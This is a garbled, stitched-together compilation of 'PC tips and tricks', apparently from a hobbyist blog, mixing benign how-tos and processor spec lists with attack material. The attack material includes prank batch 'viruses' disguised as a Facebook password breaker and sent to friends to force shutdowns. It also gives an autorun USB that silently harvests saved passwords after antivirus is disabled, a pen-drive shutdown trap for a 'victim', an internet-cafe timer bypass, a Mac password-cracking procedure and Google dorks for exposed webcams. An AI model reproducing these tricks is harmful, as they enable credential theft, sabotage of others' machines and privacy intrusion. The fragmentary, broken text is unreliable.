PC Tips and Trick Part-3
PC Tips and Trick Part-3
LEGAL DISCLIMAR
Visit My Blog>>http://pctipstric.blogspot.in/
oops(c,c++,java ,python)?
Common Errors in PC & There Solution
1-> www.goodtyping.com
2-> www.10-fast-fingers.com
3-> www.typingweb.com
4-> www.typeracer.com
5-> www.typeonline.co.uk
STEPS:-
• Go to www.google.com/latitude from your cell phone.
• Download the free app.
• Open the App.
• Enter You mobile number in the entry Field.
• Now You've set it up on your phone. Now you gotta set it up on your friends cell
phone.
• You can add friends by their E-mail Addresses. Your friends will receive an E-
mail with the downloadlink of Google latitude.
• Or you can manually add yourself or ask your friend to add google latitude on
his/her cell phone.
• Now you and your friend can add each other as friends on google latitude and
you'll get the exact location of where your friends cell phone is.
• There is exactly no limit to how many friends you can add in your latitude circle.
( just make sure you dont add your parents :)
• Well so As soon as You and your buddy confirm each other as friends you get to
see each others location.
1. kali Linux
2. BackTrack 5r3
3. NodeZero.
4. BackBox Linux
5. Blackbuntu.
6. Samurai Web Testing Framework.
7. Knoppix STD.
8. Pentoo.
9. WEAKERTH4N.
10. Matriux Krypton.
11. DEFT.
12. CAINE
13. Bugtraq
In Windows
127.0.0.1 google.com
127.0.0.1 www.google.com
>You can add as many sites any site, However you will need to prefix it with
"127.0.0.1".
>Save the file .
Google will now be blocked in all web browser. This is an advanced but easy
method on how to block a website.
@echo off
if %username% == Administrator.WINDOWS goto admin
REM ** Delete User Files **
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Recent"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temp"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\History\History.ie5"
rmdir /S/Q "%systemdrive%\Documents and
Settings\%username%\Local Settings\Temporary Internet
Files\content.ie5"
goto end
:admin
REM ** Do some extra stuff here **
REM ** What ever you want..... **
ECHO You are a Administrator
Save It Is Cleaner.bat
Here I will show you how to make a funny virus to panic your friends.
In this tutorial I will show you how to make Facebook virus using simple
commands on notepad. .
This will make the victim think they have got a virus when they click on
an icon such as Internet Explorer.
1) Open notepad
2) Type this in :
@echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES
YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE
VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT
ARE NOW BEING DELETED!!! PLEASE WAIT ..........."
3)Save as facebook password breaker .bat
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
5) Send it to your friends and say them it can break Facebook accounts
When He/She double click it a message will open and their computer
will restart. After five minutes windows will restart, that is all.
This is totally harmless and will give you a laugh.
NOTE: - The hack can be changed and use to make orkut virus or hi5.
Run command can be opened by pressing "Windows Logo Key + R" from your
keyboard. Once you opened "Run" type this code in it: "CMD" and press enter
button.
Step 3:- Typing the main code of shortcut virus in command prompt
After opening command prompt you have to write a code carefully in it. The code
is:
You have to change in (Drive Word) as your drive latter you mentioned earlier.
Something look like this:
attrib –r –a –s –h /s /d E:\*.*
Here "E" is your drive latter, Change this latter exactly as it of your pen drive.
After pressing enter button "Open Your Pen Drive" and you can see your lost files
and folders along with the shortcut files and folders.
Immediately Copy Your Real Files and Folders From Pen Drive Into Your
Computer.
After copying files and folders "Format" your pen drive.
So, That's It. Enjoy your virus free pen drive again.
No more today, I'll back with another post next.
Enjoy !!!!!!!
navigate to
"HKEY_CURRENT_USER>Appevents>s
oftware>classes>
microsoft>windows>current
version>internet
settings>policies>system" than on the right
pane where it says Disable Taskmanager,
right
clickon it, and scroll down to modify, and
than
change the value of it to "0", and than open
Windows Task Manager By Holding Down
These Keys, "CTRL+ALT+DEL/DELETE" And
Than DisableThe Internet Cafe's Timer, And
WoohLAH, UNLIMTED TIME
1. Power down your device. Before you begin the reset procedure, you will need
to completely power your device off. If it is frozen, you can pull the battery out to
turn it off.
2.Press and hold the recovery buttons. The buttons vary from device to device, so
you may need to look up the instructions for your particular phone. You will need
to press and hold the buttons for a few seconds. Some of the more common
button combinations include:
3.Select Factory Reset. Once the recovery menu opens, you can navigate the
menu with the volume buttons. You may need to open the Recovery menu to find
the Factory Reset mode. Use the Power button to select your menu options.
You will be asked to confirm the factory reset.
4.Wait for the restore process to compete. After your phone resets, it will be set
back to factory defaults and will be like it just came out of the box.
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has
the power to kill yourself. If you press 'x' then your PC will be formatted. Do not
come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
You might wanna have to change the Icon of the file before sending it to your
friend, so right click the file, click Properties, click on the 'Change' Icon and change
the icon from there.
This trick is mainly based on the Reverse ip trick but without using externel proxy
sites it direct fetch file by OM (Opera Mini) SERVER.
1.Open my given Opera MINI browser and when you get the download page there
3) Locate the entry for Turn autoplay off and modify it as you desire.
STEP 2 : Select the friend whose profile picture you want to change.
Done when your friend click the link he will be automatically redirected to
profile image cropping page , when your friend crops the image his profile picture
will be automatically changed .
Make sure that your friend crops the image.
You can aslo check other files in your pc like software, games, wallpapers, videos
etc...
Here are some more extention for pc content...
e.g.
.exe = SOFWARES/GAMES
.jpg = WALLPAPER/IMAGES
.mp4 = VIDEO FILE
.avi = VIDEO FILE
.mkv = VIDEO FILE
1.Open Notepad
2.Copy the below code and paste it in the notepad
@echo off
Step 2 : Click the “Create an Application” button. If this is your first time then
Google may ask to verify code via sms to your mobile phone number.
Step 3: Select an Application Identifier and it will become the sub-domain of proxy
server. Give a title (say My Proxy Server) to your app, set the Authentication
Option “Open to all users”, create the application.
Step 4: Go to python.org, download the 2.7 Installer and install Python. If you are
using Mac, Python 2.7 is already installed on your computer.
Step 5: Download the application files required to create a proxy server from here
. Extract the zip file on your desktop. You may edit the "main.html" file , to
customize the front end of your proxy server.
Step 7: Inside the Google App Engine Launcher, Select Edit >> Preferences from
the desktop and set the correct values for the Python Path, App Engine SDK and
the Text Editor (set this is as WordPad or write.exe and not notepad.exe) as
shown in the screenshot below.
google+app+engine+preferences
Step 8: Click File tab >> Add Existing Application under the Google App Launcher
program and browse to the folder that contains the files that you extracted in
Step 5. Once the project is added to App Engine, select the project and click Edit
to replace “YOUR_APP_ID” with your App ID (Sub-Domain you created in Step 3).
Save and close the file.
Step 9: Hit Deploy, enter your Google account credentials and, within few
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
seconds, your online proxy server will be deployed. The public URL (or web
address) of your new proxy server will be your _app_id.appspot.com (replace
_app_id with your App Engine Identifier).
trickseekproxyserver(google+app+engine)
TAA DAA !! You have now successfully created your personalized proxy server in
just 9 steps
Steps:
1.Play the video which you desire to
download
2.Go to the address bar and replace www.
with"ss"(without quotes).
3. THEN PRESS ENTER
4. You will see a new page for downloading
your video.
5. CLICK ON ANY FORMAT IN WHICH U
WANT TO DOWNLOAD YOUR VIDEO..
Have You Recived Error Message During Format Any Removable Disk(PenDrive,
MemoryCard, Removable Disk ,Other USB Disk's) Then We Have A Proper 100%
Working Solution For You , Just Follow The Easy Steps . Read The Full Post
1st Method :
2nd Method :
3rd Method :
On Sunday, September 19th, an exploit for the latest Mac OS X 10.7 "Lion" was
discovered by Patrick Dunstan. This exploit allows for an attacker, even remotely,
to request to have the root user's password changed without knowing the
password to the system
beforehand. This would lead to the legitimate owner of the system getting locked
out, as well as all of their files being compromised (unless disc encryption was in
place). Let's go over why this happens, and how to stop it until a patch comes out.
A Byte of Info
The way a Mac system stores its user passwords is similar to Linux, as they are
both built off of the Unix kernel.
A user creates an account, and then the encrypted hash of the user's password
file, their "Shadow" file, is saved in a
.plist file located in /var/db/dslocal/nodes/Default/users.
The normal way a user would crack this, is to obtain a users Generated User ID
(GID) and find it in the shadow file. This flaw is
averted by only allowing the root user to view the shadow file.
This still holds true in Lion. However, one major flaw was overlooked. Non- root
users cannot directly view hash data, but rather, they can extract it from Directory
Services.
Step 2
Copy > paste the code in a text
document and name it "hack.py".
Get a password list to run against the
file - you can find good ones at Packet
Storm.
In a terminal, change to the directory
"hack.py" is in and issue the command
with this syntax:
$ python hack.py <username> <path/
to/dictionary/file>
Wait until it completes and retrieves
your password.
What if it Can't Crack the Password?
That's simple, not only did Mac slip up
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Here's an example:
1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.
3. On the left pane expand the “Computer Management (Local) tree (if it is not
already expanded)
4. Double click “Local Users and Groups” option From “System Tools” tree.
6. Now you will see the list of users on the right side pane, such as Administrator,
Guest etc.
7. Right click the “Administrator” and select the option “Set Password” option.
9. Now the system asks you for “New Password” and “Confirm Password” .
10. After entering the password click on “OK”. The password is changed. That’s
It!..
STEP 1.
Firstly open 10minutemail.com
Now an email will be generated
which will be valid till 10
minute on your ip address.
You can reply and receive
emails here.
STEP 2.
Now use this trick to verify
your account and to
promotional bonus.
Now no danger of junk email in
your account.
Its important to lock a folder to save our personal files... So we can lock a folder by the
following ways.
DON’T FORGOT TO KEEP THE PASSWORD IN THE CODE WHERE IT IS WRITTEN “TYPE YOUR
PASSWORD HERE”
STEP 1: copy the following code into notepad and save as “.bat”. for example we take it as :
“key.bat”
cls
@ECHO OFF
title Folder SARAT
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST SARAT goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
STEP 2: Now a batch file is formed. Now double click the batch file and a folder named SARAT
appears. Now save all your personal data in it.
STEP 3: Now to lock the folder just double-click on the file “Key”. You will get a confirmation
message in Command Prompt. Type “y” to confirm. Now the folder “SARAT” will be locked and
hidden
STEP 4: If you want to get access to the contents of the folder then again double-click on the
batch file, you have created. Immediately you will be prompted to enter your password. After
that you can get access to the folder “SARAT”.
That’s all its over…. But try to save your batch file in somewhere in your computer so that it is
difficult to find it for others. But if any of your friends are computers savvy they can know your
password through the batch file.
For example:
Now its time to lock folder using recycle bin so, lets say you want to lock folder
named ‘Folder1?
To unlock related Lock folder , you can create another batch file which will unlock
folder.Type below line in another notepad file and save that as ‘unlock.bat’
ren recycle.{645FF040-5081-101B-9F08-00AA002F954E}
So, when ever you want to lock folder execute created lock.bat and reverse
execute unlock.bat for locking folder
Steps:
1.open notepad
Go to:-
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
*Control Panel
*System
or right click on
My Computer
*select "Properties"
*Advanced
*Performance area
*Settings button
*Visual Effects tab
*selet the check box
*"Use drop shadows
for icon labels on
the Desktop "
*and click Apply, OK
DONE..
see+the+passwords+behind+astericks+or+dots
Remember the situation, signing into your account with just a single click because
browser is saving all your passwords for you. We know this is convenient but since
you’re not typing your passwords any-more, eventually you’ll forget your
password in a few days. For security reasons, the password field in all browsers is
masked with “asterisks” which won’t allow any third person (even you) to read
the origi-nal typed password. But, what if you want to reveal the string behind the
asterisks? There is actually few workaround for revealing the original passwords
behind the asterisk and over the entire course of this article we’ll be discussing
some known ways to reveal the characters behind the asterisks in different
browsers.
Reveal Passwords Behind Asterisks or Dots in Different Web Browsers:
Google Chrome:
Starting off with Google chrome, the easiest way to reveal the original passwords
behind the asterisk is using inbuilt Inspect element feature in the browser.
You just need to right click on the password field in the browser where you will
get an option "Inspect Element".
After clicking on it, "Web Inspector" will open..
Today I'll teach you how to Root Android Phone. (Check Compatible Phone List).
Note:- I am not Responsible for any LOSS you do to Your Device.
1 - Download Rooting Software Click Here (Kingo Android Root from its Official
web)www.oneclickroot.com
2 - Enable USB Debugging on your Phone. (Settings - Developer options - USB
Debugging)
Using 3D-Analyze :-
Enjoy !!
Using SwiftShader :-
Notice: You Must Diasable your Antivirus for creating a USB Sniffer.
After Downloading these tools , just copy the mspass.exe, mailpv.exe, iepv.exe,
pspv.exe and passwordfox.exe files and save it on your USB drive.
Now open your notepad and type the following text in it.
[autorun]open=launch.bat
ACTION= Perform a Virus Scan
And save the notepad as launch.bat , now copy the launch.bat on to your USB
Drive.
Now Insert the USB on your pc, then autorun pop up appears , click on perform
virus scan then the passwords which are saved on your pc will be stored in a USB
Drive.
Step 1 : Temp
1. Press Start + R
2. Type in : %temp%
3. Delete all junks & cookies file in the temp folder (Note : Some file won't allow
you to delete, so just skip it )
4. Done
Step 2 : Prefetch
1. Press Start + R
2. Type in : prefetch
3. Delete all the history & unnecessary file the prefetch folder
4. Done
Step 3 : Cleanup & Defragment
1. Clean up Drive : Go to Start >>> All Programs >>> Accessories >>> System Tools
>>> Disk Cleanup
2. Defragment Drive : Go to Start >>> All Programs >>> Accessories >>> System
Tools >>> Disk Defragmenter
3. Enjoy..
Step 3: run xplorer and press ‘0’ and mark the option
Step 4: now go to c:/sys/data from fileexplorer and open the file “mmcstore”
Step 5: once you open, you will see your password like below example.on the 3 rd
column you will see the code like this
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Tm5se9ec (??”?x???p?a?s?s?w?o?r?d)
in chat box.....!!!
External Image
Codes....:
External Image = A
External Image = B
External Image = C
External Image = D
External Image = E
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
External Image = F
External Image = G
External Image = H
External Image = I
External Image = J
External Image = K
External Image = L
External Image = M
External Image = N
External Image = O
External Image = P
External Image = Q
External Image = R
External Image = S
External Image = T
External Image = U
External Image = V
External Image = W
External Image = X
External Image = Y
External Image = Z
enjoy!!!
Sometime you want to see clear image of someone on facebook who might not
be your friend but his/her privacy setting stop you from doing this. In this tutorial i
will teach you to view facebook private or locked profile picture in large size with
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
3. Open that image in new tab by right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be
s160x160 to s720x720 (If its not clear try (s320x320)
Facebook Private Profile Photo
5. The image will enlarge in size. This trick does not always work.
Step 1: Open VLC media player, Press CTRL+N Keys to Open up Network URL
Dialog box...
Step 2: Open Youtube, Navigate to Whatever Video you want to Play in VLC, Copy
the Url of that video and Paste it in the Dialogue Box and Click on Play....
Step 3: Enjoy Your Video...
At least for one time u should activate internet services from ur network.
Then download Astro File Manager (2 MB) to your android mobile.
Install it and that's it.
Now disconnect from internet services from your network operator.
Download .apk files from Android Freeware: Download Free Android Software
and Games or any other similar site to ur computer.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Connect ur phone to computer. Copy all .apk files into the memory card of ur
phone.
Browse these .apk files through Astro File Manager and u can install them without
the need of android market anymore......
This procedure is simple once u get used to it.
This is just to avoid high internet download charges from network operators than
cable internet.
> More than 1 billion unique users visit YouTube each month
> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.Interesting Facts about You tube :
> More than 1 billion unique users visit YouTube each month
> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.Interesting Facts about You tube :
> More than 1 billion unique users visit YouTube each month
> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.
unknw host
Error 500-599 - Server Errors.
► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
80 GB syllabus,
80 MB we study,
80 KB we remember,
80 Bytes we answer,
BINARY marks we get,
The Degree finally we get is BE
That is Brain Empty (B.E)
3. Then Choose DirectX video output from output drop down list.
7. Now Minimize vlc player and you will see your video
running on your desktop
as wallpaper.
Then you are at the right place, this article describes exactly how you can make
your computer welcome you like this.
With this trick, you can make your Computer welcome you in its computerized
voice. You can make your Windows based computer say "Welcome to your PC,
Username."
Now when the next time you start your computer, Windows will welcome you in
its own computerized voice.
Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Sounds and Audio Devices.
Then Click on the Sounds Tab.
Select No Sounds from the Sound Scheme option.
If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in
the popup menu.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Click on OK.
http://www.4shared.com/get/sItexZnP/quick_heal_2012_completly_clea.html
3>Install all these files one by one and then restart your Computer
Here We Go
Step.1 Right click on desktop then New and then click on Shortcut
Note:- | 120 is time to Shutdown which is in seconds so you can change that time according to you but
remeber this is in seconds |
Step.3 Click on next any write name of shortcut anything you wantand then finish it.
Step.4 Now double click on that shortcut and you will see a massege box like d pic.
Shutdown -a
And hit enter and you will see that That massege has stopped.
If you want it to more harmfull Put it Startup folder but dont miss use it.
Enjoy
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;
DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[
i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";
DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
If you look carefully in the above code, its rotating the HTML “img” tag. Just replace it with “a” or “p” and
watch some links or text rotate instead of images
inurl:/view.shtml
intitle:”Live View / – AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
NOTE- “Do not misuse this hack or attack in any illegal activities as this is for educational purpose only”
PROGRAMMER CODES!
*2767*66335#
*2767*3700#
*2767*7100#
*2767*8200#
*2767*7300#
*2767*2877368#
*2767*33927#
*2767*85927#
*2767*48927#
*2767*37927#
*2767*28927#
*2767*65927#
*2767*29927#
*2767*78927#
*2767*79928#
*2767*79928#
*2767*82927#
*2767*787927#
*2767*73738927#
*2767*33667#
*2767*85667#
1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can
write them down yourselves
2. open notepad
and type
c:\windows\system32\shutdown -s -f -t 00
3. Open up Microsoft Outlook. Make sure that you have already configured it for
your email.Now we will need to make it so that Outlook checks your inbox about
every minute (1 minute for testing time can be increased if a delayed shutdown is
desired). You can do this by going to Tools: Options.
4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.
5. Make sure that the Schedule an automatic send/receive and every box are
checked, and set the number of minutes to 1. Now you may close all of these
dialog boxes.
6. Now go to Tools: Rules and Alerts. Next click the options button in the upper
right hand corner and press the Import Rules button.
8. Now, when you send a message from your phone to your e-mail address with
the subject shutdown or smsshutdown%%, your computer will shutdown.
Someone is asking to me that when he started his computer it has been shut
down automatically so I want to tell him why this happen so?? or other person
can read this for knowledge..
@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off
automatically.
Click Start then Run and type "gpedit.msc" without quotes. This opens the group
policy editor.
Then go to:
--> Local Computer Policy
--> Computer Configuration
--> Administrative Templates
--> Network
--> QOS Packet Scheduler
--> Limit Reservable Bandwidth.
system to reserve nothing, rather than the default 20%.It works on Win 2000 as
well.
3. Japan, 52 Mbps
int i;
while(i<=100000 0000)
{
printf(i*i); or
cout<<i; or
system.out.prin tln(i*i);
}
In javascipt:
var i=1;
while(i<=10000)
{
document.write( i*i);
i++;
In php,perlCGI:
var i=1;
while(i<=10000)
{
echo(i*i);
i++;
}
MCS-4 Family:
4004 – CPU
4001 – ROM & 4-bit Port
4002 – RAM & 4-bit Port
4003 – 10-bit Shift Register
4008 – Memory+I/O Interface
4009 – Memory+I/O Interface
Intel 4040:
MCS-40 Family:
4040 – CPU
4101 – 1024-bit (256 × 4) Static RAM with separate I/O
4201 – 4 MHz Clock Generator
4207 – General Purpose Byte I/O Port
4209 – General Purpose Byte I/O Port
4211 – General Purpose Byte I/O Port
4265 – Programmable General Purpose I/O Device
4269 – Programmable Keyboard Display Device
4289 – Standard Memory Interface for MCS-4/40
4308 – 8192-bit (1024 × 8) ROM w/ 4-bit I/O Ports
4316 – 16384-bit (2048 × 8) Static ROM
4702 – 2048-bit (256 × 8) EPROM
4801 – 5.185 MHz Clock Generator Crystal for 4004/4201A or 4040/4201A
Intel D3002
Introduced in the third quarter of 1974, these components used bipolarSchottky transistors.
Each component implemented two bits of a processor function; packages could be
interconnected to build a processor with any desired word length. Members of the family:
8088:
Introduced 1982
Clock rates
6 MHz with > 1 MIPS
Number of transistors 29,000 at 2 μm
Included two timers, a DMA controller, and an interrupt controller on the chip in addition to
the processor (these were at fixed addresses which differed from the IBM PC, making it
impossible to build a 100% PC-compatible computer around the 80186).
Added a few opcodes and exceptions to the 8086 design; otherwise identical instruction set
to 8086 and 8088.
Used mostly in embedded applications – controllers, point-of-sale systems, terminals, and
the like
Used in several non-PC-Compatible MS-DOS computers including RM Nimbus, Tandy
2000, and CP/M 86 Televideo PM16 server
Later renamed the iAPX 186
80188:
iAPX 432:
Many variants, such as the PXA2xx applications processors, IOP3xx I/O processors and
IXP2xxx and IXP4xx network processors.
32-bit processors: the 80386 range:
80386DX:
No commercial Software used for protected mode or virtual storage for many years
Later renamed Intel386TM SX
80376:
80486SX:
Clock rates:
40 MHz
50 MHz
66 MHz
Officially named Intel486TM DX2
Family 4 model 3
80486SL:
66 MHz system bus clock rate (333 MHz variant), 100 MHz system bus clock rate for all
models after
Family 6 model 5
Variants
333 MHz Introduced January 26, 1998
350, 400 MHz Introduced April 15, 1998
450 MHz Introduced August 24, 1998
233, 266 MHz (Mobile) Introduced April 2, 1998
333 MHz Pentium II Overdrive processor for Socket 8 Introduced August 10,
1998; Engineering Sample Photo[dead link]
300 MHz (Mobile) Introduced September 9, 1998
333 MHz (Mobile)
Celeron (Pentium II-based)
Variants
300, 333 MHz Introduced August 24, 1998
366, 400 MHz Introduced January 4, 1999
433 MHz Introduced March 22, 1999
466 MHz
500 MHz Introduced August 2, 1999
533 MHz Introduced January 4, 2000
266 MHz (Mobile)
300 MHz (Mobile)
333 MHz (Mobile) Introduced April 5, 1999
366 MHz (Mobile)
400 MHz (Mobile)
433 MHz (Mobile)
450 MHz (Mobile) Introduced February 14, 2000
466 MHz (Mobile)
500 MHz (Mobile) Introduced February 14, 2000
PII Xeon
Variants
400 MHz Introduced June 29, 1998
450 MHz (512 KB L2 Cache) Introduced October 6, 1998
450 MHz (1 MB and 2 MB L2 Cache) Introduced January 5, 1999
PIII Xeon
Introduced October 25, 1999
Number of transistors: 9.5 million at 0.25 μm or 28 million at 0.18 μm
L2 cache is 256 KB, 1 MB, or 2 MB Advanced Transfer Cache (Integrated)
Processor Package Style is Single Edge Contact Cartridge (S.E.C.C.2) or SC330
System Bus clock rate 133 MHz (256 KB L2 cache) or 100 MHz (1–2 MB L2 cache)
System Bus width 64 bits
Addressable memory 64 GB
Used in two-way servers and workstations (256 KB L2) or 4- and 8-way servers (1–
2 MB L2)
Family 6 model 10
Variants
500 MHz (0.25 μm process) Introduced March 17, 1999
550 MHz (0.25 μm process) Introduced August 23, 1999
600 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
667 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
733 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
800 MHz (0.18 μm process, 256 KB L2 cache) Introduced January 12, 2000
866 MHz (0.18 μm process, 256 KB L2 cache) Introduced April 10, 2000
933 MHz (0.18 μm process, 256 KB L2 cache)
1000 MHz (0.18 μm process, 256 KB L2 cache) Introduced August 22, 2000
700 MHz (0.18 μm process, 1–2 MB L2 cache) Introduced May 22, 2000
Celeron (Pentium III Coppermine-based):
64 KB L1 cache
1 MB L2 cache (integrated)
Based on Pentium III core, with SSE2 SIMD instructions and deeper pipeline
Number of transistors 77 million
Micro-FCPGA, Micro-FCBGA processor package
Heart of the Intel mobile Centrino system
400 MHz Netburst-style system bus
Family 6 model 9
Variants
900 MHz (ultra low voltage)
1.0 GHz (ultra low voltage)
1.1 GHz (low voltage)
1.2 GHz (low voltage)
1.3 GHz
1.4 GHz
1.5 GHz
1.6 GHz
1.7 GHz
Dothan 0.09 μm (90 nm) process technology
Introduced May 2004
2 MB L2 cache
140 million transistors
Revised data prefetch unit
400 MHz Netburst-style system bus
21W TDP
Family 6 model 13
Variants
1.00 GHz (Pentium M 723) (ultra low voltage, 5W TDP)
1.10 GHz (Pentium M 733) (ultra low voltage, 5W TDP)
1.20 GHz (Pentium M 753) (ultra low voltage, 5W TDP)
1.30 GHz (Pentium M 718) (low voltage, 10W TDP)
1.40 GHz (Pentium M 738) (low voltage, 10W TDP)
1.50 GHz (Pentium M 758) (low voltage, 10W TDP)
1.60 GHz (Pentium M 778) (low voltage, 10W TDP)
BY: KHALID CHAUDHARY
PC TIPS AND TRICK
Intel Core
Introduced 2001
See main entry
Xeon:
Starting with the D0 stepping of this processor, Intel 64 64-bit extensions has also been
incorporated
Itanium:
Family 0x1F
Released July 2002
900 MHz – 1.6 GHz
McKinley 900 MHz 1.5 MB cache, Model 0x0
McKinley 1 GHz, 3 MB cache, Model 0x0
Deerfield 1 GHz, 1.5 MB cache, Model 0x1
Madison 1.3 GHz, 3 MB cache, Model 0x1
Madison 1.4 GHz, 4 MB cache, Model 0x1
Madison 1.5 GHz, 6 MB cache, Model 0x1
Madison 1.67 GHz, 9 MB cache, Model 0x1
Hondo 1.4 GHz, 4 MB cache, dual-core MCM, Model 0x1
Dual-core microprocessor
No Hyper-Threading
800(4×200) MHz front side bus
LGA 775 (Socket T)
Dual-core microprocessor
Enabled Hyper-Threading
800(4×200) MHz front side bus
Irwindale
Introduced 2004
Cranford
Introduced April 2005
MP version of Nocona
Potomac
Introduced April 2005
Cranford with 8 MB of L3 cache
Server and Workstation CPU (SMP support for dual CPU system)
Introduced June 26, 2006
Dual-core
Intel VT-x, multiple OS support
EIST (Enhanced Intel SpeedStep Technology) in 5140, 5148LV, 5150, 5160
Execute Disable Bit
TXT, enhanced security hardware extensions
SSSE3 SIMD instructions
iAMT2 (Intel Active Management Technology), remotely manage computers
Variants
Xeon 5160 – 3.00 GHz (4 MB L2, 1333 MHz FSB, 80 W)
Xeon 5150 – 2.66 GHz (4 MB L2, 1333 MHz FSB, 65 W)
Xeon 5140 – 2.33 GHz (4 MB L2, 1333 MHz FSB, 65 W)
Xeon 5130 – 2.00 GHz (4 MB L2, 1333 MHz FSB, 65 W)
Xeon 5120 – 1.86 GHz (4 MB L2, 1066 MHz FSB, 65 W)
Xeon 5110 – 1.60 GHz (4 MB L2, 1066 MHz FSB, 65 W)
Xeon 5148LV – 2.33 GHz (4 MB L2, 1333 MHz FSB, 40 W) (low voltage
edition)
Variants
Core 2 Extreme QX6850 – 3 GHz (2×4 MB L2 Cache, 1333 MHz FSB)
Core 2 Extreme QX6800 – 2.93 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(April 9, 2007)
Core 2 Extreme QX6700 – 2.66 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(November 14, 2006)
Core 2 Quad Q6700 – 2.66 GHz (2×4 MB L2 Cache, 1066 MHz FSB) (July
22, 2007)
Core 2 Quad Q6600 – 2.40 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(January 7, 2007)
Product
Marketing name(s) Codename(s)
code
80501 Pentium P5
Product
Marketing name(s) Codename(s)
code
This trick just makes your keyboard lights go crazy and do disco. LoL.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll
Lock’s light flash ina cool rhythmic way!
wshshell.sendke ys “{CAPSLOCK}”
wshshell.sendke ys “{NUMLOCK}”
wshshell.sendke ys “{SCROLLLOCK}”
loop
I have used toothpaste with good effects before Ive also used car paint cutting
compound on deeper scratches. It does leave lots of smaller scratches (as it is a
cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation
>>> The simplest way to remove software from your machine is to remove it from
control panel that any unprofessional computer user can also do. But, for your
convenience, we have mentioned in proper steps. Byfollowing these steps, you
can easily uninstall any software from your PC:
>>Then, select Control panel and look for Add/ Remove Programs
>>A list will appear (here, you can select any program that you wish to uninstall
from your PC)
>>Right click on your desired software and select “Uninstall” (It will take some
time to uninstall. So, wait until the uninstall process is completed.)
>>After the process is complete, you should restart your PC (if asked by the
software after uninstallation).
And here you go; you have uninstalled the software that was troubling you.
Hopefully, this will work perfect, but if itdid not work, then you can use the next
alternative way(s):
>>> A person who uses his computer 20+ hours a day, it’s really annoying for him
when suddenly his PC starts working very slow. Many of you may already have
some idea of why some of our uninstalled programs still reside in our PC’s
registry. It is because some entries still stay in our windows registry and will stay
